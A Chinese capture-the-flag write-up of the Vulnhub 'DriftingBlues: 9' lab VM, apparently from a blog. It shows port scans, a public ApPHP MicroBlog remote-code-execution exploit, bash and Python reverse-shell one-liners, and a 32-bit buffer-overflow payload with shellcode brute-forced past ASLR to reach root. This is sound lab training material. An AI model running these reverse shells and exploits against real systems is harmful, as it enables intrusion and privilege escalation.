【Vulnhub 靶场】【DriftingBlues: 9 (final)】【简单】【20210509】

1、环境介绍

靶场介绍:https://www.vulnhub.com/entry/driftingblues-9-final,695/
靶场下载:https://download.vulnhub.com/driftingblues/driftingblues9.ova
靶场难度:简单
发布日期:2021年05月09日
文件大小:738 MB
靶场作者:tasiyanci
靶场描述:get flags
打靶耗时:2+小时
打靶关键

  1. 版本漏洞查询 与 利用
  2. 缓存溢出提权(靶场内说指导书)

2、主机发现与端口扫描

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    3a:f9:d3:90:a4:64       (Unknown: locally administered)
192.168.56.45   08:00:27:72:14:c9       PCS Systemtechnik GmbH

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.288 seconds (111.89 hosts/sec). 2 responded
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.45
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-30 01:04 EST
Nmap scan report for 192.168.56.45
Host is up (0.00054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: ApPHP MicroBlog vCURRENT_VERSION
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: ApPHP MicroBlog
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34567/tcp   status
|   100024  1          52654/tcp6  status
|   100024  1          58354/udp6  status
|_  100024  1          58383/udp   status
34567/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:72:14:C9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.56.45

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.95 seconds
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap --script=vuln -p 80,111,34567 192.168.56.45
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-30 01:20 EST
Nmap scan report for 192.168.56.45
Host is up (0.00047s latency).

PORT      STATE  SERVICE
80/tcp    open   http
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
|_http-dombased-xss: Couldn·t find any DOM based XSS.
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-stored-xss: Couldn·t find any stored XSS vulnerabilities.
|_http-csrf: Couldn·t find any CSRF vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|   /admin/home.php: Possible admin folder
|   /backup/: Backup folder w/ directory listing
|   /rss.xml: RSS or Atom feed
|   /README.txt: Interesting, a readme.
|   /docs/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /include/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /license/: Potentially interesting folder
|   /page/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_  /styles/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
111/tcp   open   rpcbind
34567/tcp closed dhanalakshmi
MAC Address: 08:00:27:72:14:C9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 43.73 seconds

3、端口访问

3.1、80端口 - Web

在这里插入图片描述
在这里插入图片描述

  • 版本漏洞查询(可利用
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# searchsploit ApPHP 1.0.1
------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                           |  Path
------------------------------------------------------------------------- ---------------------------------
ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities                         | php/webapps/33030.txt
ApPHP MicroBlog 1.0.1 - Remote Command Execution                         | php/webapps/33070.py
------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
  • 页面信息收集
    • 是否说明要新增域名:vvmlist.github.io
hello all, erdal komurcu here. i regret to tell you that drifting blues tech is sold to vvmlist.github.io.
大家好,Erdal Komurcu 在这里。我很遗憾地告诉你,Drifting Blues Tech 被卖给了 vvmlist.github.io。
  • 尝试新增 hosts
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# cat /etc/hosts                                             
127.0.0.1       localhost
127.0.1.1       kali
......
192.168.56.45 vvmlist.github.io

在这里插入图片描述

3.2、111端口 - RPCBind

  • 漏洞查询
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# searchsploit rpcbind    
------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                           |  Path
------------------------------------------------------------------------- ---------------------------------
rpcbind - CALLIT procedure UDP Crash (PoC)                               | linux/dos/26887.rb
RPCBind / libtirpc - Denial of Service                                   | linux/dos/41974.rb
Wietse Venema Rpcbind Replacement 2.1 - Denial of Service                | unix/dos/20376.txt
------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

3.3、3456端口 - 不知道是个啥

4、ApPHP 漏洞利用

4.1、33070.py(成功)

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# searchsploit -m 33070.py
  Exploit: ApPHP MicroBlog 1.0.1 - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/33070
     Path: /usr/share/exploitdb/exploits/php/webapps/33070.py
    Codes: OSVDB-106352, OSVDB-106351
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /root/soft/hack/33070.py
  • 查看使用方法
    • 根据代码特征判断Python环境:Python 2.7
    • 根据代码描述,使用方法:python 33070.py {URL主页地址}
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat 33070.py  
#!/usr/bin/python
import random
import hashlib
import urllib
from base64 import b64encode as b64
import sys
import re

# Exploit Title: Python exploit for ApPHP MicroBlog 1.0.1 (Free Version) - RCE
# Exploit Author: LOTFREE
# Version: ApPHP MicroBlog 1.0.1 (Free Version)
# EDB-ID: 33030

print "  -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-"
print "original exploit by Jiko : http://www.exploit-db.com/exploits/33030/"

if len(sys.argv) < 2:
    print "Usage: python {0} http://target/blog/index.php".format(sys.argv[0])
    sys.exit()
......
  • 切换Python环境,并执行脚本
    • 获取数据库用户密码:clapton : yaraklitepe
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# conda activate py27
                                                                                                           
(py27) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# python 33070.py http://vvmlist.github.io/index.php
  -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-
original exploit by Jiko : http://www.exploit-db.com/exploits/33030/
[*] Testing for vulnerability...
[+] Website is vulnerable

[*] Fecthing phpinfo
        PHP Version 5.6.40-0+deb8u12
        System   Linux debian 3.16.0-4-586 #1 Debian 3.16.51-2 (2017-12-03) i686
        Loaded Configuration File   /etc/php5/apache2/php.ini
        Apache Version   Apache/2.4.10 (Debian)
        User/Group   www-data(33)/33
        Server Root   /etc/apache2
        DOCUMENT_ROOT   /var/www/html
        PHP Version   5.6.40-0+deb8u12
        allow_url_fopen  On  On
        allow_url_include  Off  Off
        disable_functions  pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,  pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
        open_basedir   no value    no value
        System V Message based IPC   Wez Furlong
        System V Semaphores   Tom May
        System V Shared Memory   Christian Cartus

[*] Fetching include/base.inc.php
		<?php
			// DATABASE CONNECTION INFORMATION
			define('DATABASE_HOST', 'localhost');           // Database host
			define('DATABASE_NAME', 'microblog');           // Name of the database to be used
			define('DATABASE_USERNAME', 'clapton'); // User name for access to database
			define('DATABASE_PASSWORD', 'yaraklitepe');     // Password for access to database
			define('DB_ENCRYPT_KEY', 'p52plaiqb8');         // Database encryption key
			define('DB_PREFIX', 'mb101_');              // Unique prefix of all table names in the database
		?>

[*] Testing remote execution
[+] Remote exec is working with system() :)
Submit your commands, type exit to quit
> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

4.2、33030.txt(上面成功了,这个就不尝试了)

5、反弹链接

  • 尝试不同反弹命令(下面两条反弹失败)
> bash -c 'bash -i >& /dev/tcp/192.168.56.3/10086 0>&1'
> bash -i >& /dev/tcp/192.168.56.3/10086 0>&1
  • 反弹成功
> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.3",10086));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nc -lvnp 10086
listening on [any] 10086 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.45] 58345
bash: cannot set terminal process group (535): Inappropriate ioctl for device
bash: no job control in this shell
www-data@debian:/var/www/html$

6、信息收集

  • 获取用户:clapton
  • 前面获取了同用户名的 MySQL 密码,尝试切换用户
www-data@debian:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
statd:x:105:65534::/var/lib/nfs:/bin/false
messagebus:x:106:112::/var/run/dbus:/bin/false
mysql:x:107:114:MySQL Server,,,:/var/lib/mysql:/bin/false
clapton:x:1000:1000:,,,:/home/clapton:/bin/bash

7、尝试切换用户

  • 切换报错(是由于当前 shell 的问题)
www-data@debian:/var/www/html$ su clapton
su clapton
su: must be run from a terminal
  • 重新换一个 shell 就可以了
www-data@debian:/var/www/html$ SHELL=/bin/bash script -q /dev/null
SHELL=/bin/bash script -q /dev/null
www-data@debian:/var/www/html$ su clapton
su clapton
Password: yaraklitepe

clapton@debian:/var/www/html$

7.1、信息收集

  • 提示:缓存区溢出提权,并且提供了说明书
    • https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
    • https://samsclass.info/127/proj/lbuf1.htm
  • 发现S权限的文件:input
    • 文件使用:/home/clapton/input <input string>
clapton@debian:/var/www/html$ cd ~
cd ~
clapton@debian:~$ ls -al
ls -al
total 24
dr-x------ 2 clapton clapton 4096 May  9  2021 .
drwxr-xr-x 3 root    root    4096 May  9  2021 ..
-rwsr-xr-x 1 root    root    5150 Sep 22  2015 input
-rwxr-xr-x 1 root    root     201 May  9  2021 note.txt
-rw-r--r-- 1 clapton clapton   32 May  9  2021 user.txt
clapton@debian:~$ cat note.txt
cat note.txt
buffer overflow is the way. ( ͡° ͜ʖ ͡°)
缓冲区溢出是一种方法。( ͡° ͜ʖ ͡°)
if you're new on 32bit bof then check these:
如果您是32位bof的新手,请检查以下内容:
https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm
  
  
clapton@debian:~$ cat user.txt
cat user.txt
F569AA95FAFF65E7A290AB9ED031E04F

clapton@debian:~$ strings /home/clapton/input
strings /home/clapton/input
bash: strings: command not found
clapton@debian:~$ /home/clapton/input
/home/clapton/input
Syntax: /home/clapton/input <input string>

7.2、文件传出 与 解析

  • 文件传出
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# nc -nlvp 1234 > input   
listening on [any] 1234 ...
clapton@debian:~$ nc 192.168.56.3 1234 < /home/clapton/input
nc 192.168.56.3 1234 < /home/clapton/input
  • 文件解析
    • 发现未做限制的strcpy()函数
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# strings ./input   
/lib/ld-linux.so.2
,x!L
libc.so.6
_IO_stdin_used
strcpy    <-- 未做限制的 strcpy()函数
exit
printf

8、缓存溢出命令构造 与 提权

8.1、检测 ALSR 防溢出设置(启动了防溢出)

  • 0:关闭。
  • 1:半随机。共享库、栈、mmap() 以及 VDSO 将被随机化。
  • 2:全随机。
clapton@debian:~$ cat /proc/sys/kernel/randomize_va_space
cat /proc/sys/kernel/randomize_va_space
2 # 全随机

8.2、payload 构造

  • 用 metasploit 中的 pattern_create.rb 生成数量 1000 的字符串用来计算偏移量
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9A......
  • 文件授权
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# chmod +x input
  • 将生成的字符串用命令 r 在 gdb 中运行,如下,程序报错,显示在这个地址出现错误:0x41376641
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# gdb -q ./input 
Reading symbols from ./input...
(No debugging symbols found in ./input)
(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9A......
Starting program: /root/soft/hack/input Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9A......
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x41376641 in ?? ()
(gdb) exit
A debugging session is active.

        Inferior 1 [process 13527] will be killed.

Quit anyway? (y or n) y
  • 计算下此地址:0x41376641 的偏移量
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x41376641
[*] Exact match at offset 171
  • 获取 payload 需要的值:0xbfc32640
clapton@debian:~$ gdb -q /home/clapton/input
gdb -q /home/clapton/input
Reading symbols from /home/clapton/input...(no debugging symbols found)...done.

# 计算出偏移量是 171,用 python 构造字符串;0x42424242
(gdb) r $(python -c 'print("A" * 171 + "B" * 4 + "\x90" * 64 )')
Starting program: /home/clapton/input $(python -c 'print("A" * 171 + "B" * 4 + "\x90" * 64 )')

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

# 查看ESP寄存器的值;0xbfc32640
(gdb) x/s $esp
0xbfc32640:     '\220' <repeats 64 times>
(gdb) q
A debugging session is active.

        Inferior 1 [process 21267] will be killed.

Quit anyway? (y or n) y
  • 用 ESP 寄存器的 0xbfc32640 替换 4 个 B,因为是小字节序,倒过来写,构造 payload
    • 至于怎么构造的,我也不是很清楚,需要有汇编语言基础,按道理来讲,应该是通用的
$(python -c 'print("A" * 171 + "\x40\x26\xc3\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')
  • 最后完整命令
/home/clapton/input $(python -c 'print("A" * 171 + "\x40\x26\xc3\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')

8.3、提权

  • 由于靶机启动了ALSR,于是使用循环
    • 此处尝试美化命令行,但是美化后,就失去了root权限
clapton@debian:~$ for i in {1..10000}; do (/home/clapton/input $(python -c 'print("A" * 171 + "\x40\x26\xc3\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')); done
<\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')); done         
Segmentation fault
Segmentation fault
......
# SHELL=/bin/bash script -q /dev/null
SHELL=/bin/bash script -q /dev/null
bash-4.3$ id
id
uid=1000(clapton) gid=1000(clapton) groups=1000(clapton)
bash-4.3$ exit
exit
exit
# id
id
uid=1000(clapton) gid=1000(clapton) euid=0(root) groups=1000(clapton)
# id
id
uid=1000(clapton) gid=1000(clapton) euid=0(root) groups=1000(clapton)
# cd /root
cd /root
# ls -al
ls -al
total 16
drwx------  2 root root 4096 May  9  2021 .
drwxr-xr-x 21 root root 4096 May  9  2021 ..
-rw-------  1 root root  649 May  9  2021 .bash_history
-rw-r--r--  1 root root  295 May  9  2021 root.txt
# cat root.txt
cat root.txt
   
this is the final of driftingblues series. i hope you've learned something from them.

you can always contact me at vault13_escape_service[at]outlook.com for your questions. (mail language: english/turkish)

your root flag:

04D4C1BEC659F1AA15B7AE731CEEDD65

good luck. ( ͡° ͜ʖ ͡°)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/205490.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

达索系统SOLIDWORKS 2024工程图新功能

工程图概述 设计模型不仅能比绘制直线更快&#xff1b;SOLIDWORKS 从模型中生成工程图&#xff0c;模型的参数和几何关系在工程图中被保留&#xff0c;这样工程图可反映模型的设计意图&#xff1b;模型或工程图中的更改反映在其相关文件中&#xff0c;这样更改起来更容易&…

map文件解析

Map文件内容分为以下五段&#xff1a; 1&#xff09;Section Cross References&#xff1a;模块、段(入口)交叉引用&#xff1b;(ASR编译生成的map文件没有输出该段信息) 2&#xff09;Removing Unused input sections from the image&#xff1a;移除未使用的模块&#xff1…

【Linux】基础IO--文件基础知识/文件操作/文件描述符

文章目录 一、文件相关基础知识二、文件操作1.C语言文件操作2.操作系统文件操作2.1 比特位传递选项2.2 文件相关系统调用2.3 文件操作接口的使用 三、文件描述符fd1.什么是文件描述符2.文件描述符的分配规则 一、文件相关基础知识 我们对文件有如下的认识&#xff1a; 1.文件 …

java设计模式学习之【建造者模式】

文章目录 引言建造者模式简介定义与用途实现方式&#xff1a; 使用场景优势与劣势建造者模式在spring中的应用CD&#xff08;光盘&#xff09;的模拟示例UML 订单系统的模拟示例UML 代码地址 引言 建造者模式在创建复杂对象时展现出其强大的能力&#xff0c;特别是当这些对象需…

带大家做一个,易上手的家常炒鸡蛋

想做这道菜 先准备五个鸡蛋 然后将鸡蛋打到碗里面 然后 加小半勺盐 这个看个人喜好 放多少都没问题 不要太咸就好 将鸡蛋搅拌均匀 起锅烧油 油温热了之后 放三个干辣椒进去炒 干辣椒烧黑后 捞出来 味道就留在油里了 然后 倒入鸡蛋液 翻炒 注意翻炒 不要粘锅底 或者 一面糊…

嵌入式Linux:ARM驱动+QT应用+OpenCV人脸识别项目实现

一、前言&#xff1a; 这个项目主要分为两部分&#xff0c;客户端&#xff08;ARM板端&#xff09;负责利用OpenCV采集人脸数据&#xff0c;利用TCP将人脸数据发送给服务器&#xff0c;然后服务器根据人脸数据进行人脸识别&#xff0c;将识别后的结果返还给客户端&#xff0c;客…

【Linux】环境变量

文章目录 1. 环境变量的概念2. 常见的环境变量3. 查看环境变量的方法4. 测试PATH5. 和环境变量有关的命令6. 环境变量的组织方式7. 通过代码获取环境变量7.1 通过命令行的第三个参数7.2 通过第三方变量environ 8. 通过系统调用获取9. 环境变量的全局属性 1. 环境变量的概念 **…

函数指针数组指针数组传参的本质字符指针(进阶篇)

&#x1f680; 作者&#xff1a;阿辉不一般 &#x1f680; 你说呢&#xff1a;不服输的你&#xff0c;他们拿什么赢 &#x1f680; 专栏&#xff1a;爱上C语言 &#x1f680;作图工具&#xff1a;draw.io(免费开源的作图网站) 如果觉得文章对你有帮助的话&#xff0c;还请点赞…

【带头学C++】----- 八、C++面向对象编程 ---- 8.5 struct结构体类型增强使用说明

目录 8.5 struct结构体类型增强使用说明 8.5.1 C结构体可以定义成员函数 8.5.2 c中定义结构体变量可以不加struct关键字 8.6 bool布尔类型关键字 8.5 struct结构体类型增强使用说明 第六章对结构体的使用、内存对齐以及数组、深拷贝和浅拷贝进行了一个详细的说明&#xff0c…

带键扫的LED专用驱动方案

一、基本概述 TM1650 是一种带键盘扫描接口的LED&#xff08;发光二极管显示器&#xff09;驱动控制专用电路。内部集成有MCU输入输出控制数字接口、数据锁存器、LED 驱动、键盘扫描、辉度调节等电路。TM1650 性能稳定、质量可靠、抗干扰能力强&#xff0c;可适用于24 小时长期…

对抗产品团队中的认知偏误:给产品经理的专家建议

今天的产品经理面临着独特的挑战。他们不仅需要设计和构建创新功能&#xff0c;还必须了解这些功能将如何为客户带来价值并推进关键业务目标。如果不加以控制&#xff0c;认知偏差可能会导致您构建的内容与客户想要的内容或业务需求之间不一致。本文将详细阐述产品经理可以避免…

【EI会议征稿】第四届应用数学、建模与智能计算国际学术会议(CAMMIC 2024)

第四届应用数学、建模与智能计算国际学术会议&#xff08;CAMMIC 2024&#xff09; 2024 4th International Conference on Applied Mathematics, Modelling and Intelligent Computing 第四届应用数学、建模与智能计算国际学术会议&#xff08;CAMMIC 2024&#xff09;将于…

超详细!Opencv人脸识别!附源码!

一、新建环境 注意&#xff01;&#xff01;确定后需要关闭项目&#xff0c;重新打开&#xff0c;终端的环境才会变化&#xff01;&#xff01; 二、下载安装包&#xff08;只需要3个即可&#xff09; 1. 下载dlib包 pip install dlib-19.19.0-cp38-cp38-win_amd64.whl.whl …

XTU OJ 1339 Interprime 学习笔记

链接 传送门 代码 #include<bits/stdc.h> using namespace std;const int N1e610; //78498 我计算了一下&#xff0c;6个0的范围内有这么多个素数&#xff0c;所以开这么大的数组存素数 //计算的代码是一个循环 int prime[80000]; int a[N],s[N];//s数组是前缀和数组b…

力扣 --- 删除有序数组中的重复项 II

题目描述&#xff1a; 给你一个有序数组 nums &#xff0c;请你 原地 删除重复出现的元素&#xff0c;使得出现次数超过两次的元素只出现两次 &#xff0c;返回删除后数组的新长度。 不要使用额外的数组空间&#xff0c;你必须在 原地 修改输入数组 并在使用 O(1) 额外空间的…

时序预测 | Python实现GA-TCN-LSTM遗传算法-时间卷积神经网络-长短期记忆网络时间序列预测

时序预测 | Python实现GA-TCN-LSTM遗传算法-时间卷积神经网络-长短期记忆网络时间序列预测 目录 时序预测 | Python实现GA-TCN-LSTM遗传算法-时间卷积神经网络-长短期记忆网络时间序列预测预测效果基本介绍程序设计参考资料 预测效果 基本介绍 使用先进的机器学习技术和优化算法…

Ubuntu systemd-analyze命令(系统启动性能分析工具:分析系统启动时间,找出可能导致启动缓慢的原因)

文章目录 Ubuntu systemd-analyze命令剖析目录简介systemd与systemd-analyze工作原理 安装和使用命令参数详解用例与示例显示启动时间&#xff08;systemd-analyze time&#xff09;列出启动过程中各个服务的启动时间&#xff08;systemd-analyze blame&#xff09;显示系统启动…

没想法、没经验做不了BI?求你,别再自我pua了

“我没想法&#xff0c;没经验&#xff0c;做不了BI报表&#xff0c;是不是不适合现代职场啊&#xff01;”在网上看到不少姐妹有这种迷惘发言&#xff0c;真的就&#xff0c;恨铁不成钢。求你了&#xff0c;别再自我pua了。你没想法没经验多正常啊&#xff0c;因为你没用过BI报…

Django 模板引擎 (四)

一、Django模板引擎 一个强大的工具&#xff0c;用于在HTML页面中嵌入动态内容。它使用一种被称为Django模板语言&#xff08;Django Template Language&#xff09;的简单而强大的语法来处理模板。该模板语言使用”{% %}”进行标记&#xff0c;用于执行各种操作。 二、Django…

指针数组以及利用函数指针来实现简易计算器及typedef关键字(指针终篇)

文章目录 &#x1f680;前言&#x1f680;两段有趣的代码✈️typedef关键字 &#x1f680;指针数组&#x1f680;简易计算器的实现 &#x1f680;前言 基于阿辉前两篇博客指针的基础篇和进阶篇对于指针的了解&#xff0c;那么今天阿辉将为大家介绍C语言的指针剩下的部分&#…